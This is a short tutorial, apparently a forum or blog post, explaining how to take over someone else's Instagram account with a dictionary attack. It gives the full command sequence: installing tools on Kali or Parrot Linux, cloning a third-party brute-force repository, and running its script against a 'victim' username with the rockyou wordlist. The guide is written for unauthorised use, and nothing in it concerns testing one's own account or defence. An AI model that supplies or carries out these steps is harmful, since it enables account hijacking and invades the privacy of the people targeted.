Let's begin;
The first requirement is to have Kali Linux, Parrot Sec OS, or any other Linux OS. You can download Parrot OS from https://parrotsec.org and Kali Linux from kali.org.
That's all you need. Now, let's start the guide. Firstly, ensure you have an internet connection, a functioning brain, and don't forget Linux, any distribution or flavor will do. For the purpose of this tutorial, I will be using the brute force technique. Brute force involves trying random passwords from a predefined character set against a single user.
Specifically, I will be discussing a dictionary attack, where passwords are stored in a file and tried against a single user.
Open Terminal
Run 'apt update && apt upgrade -y'
Install git using 'apt-get install git'
Install Python using 'apt-get install python'
Install Python3 using 'apt-get install python3'
Change directory to Desktop using 'cd Desktop'
Clone the GitHub repository using 'git clone https://github.com/Pure-L0G1C/Instagram
(https://github.com/Pure-L0G1C/Instagram)After completing the 7th command, proceed with:
Run 'chmod +x Instagram'
Navigate to the Instagram directory using 'cd Instagram'
Run 'python instagram.py -h' to access the help menu. Finally, enter the following command: 'python/2/3 instagram.py USERNAME OF VICTIM /Path_of_wordlist_file' (the wordlist file is usually located in /usr/share/wordlists, extract rockyou there and replace the path).
If the victim's password is in rockyou, the method will work; otherwise, you may need to explore other options.
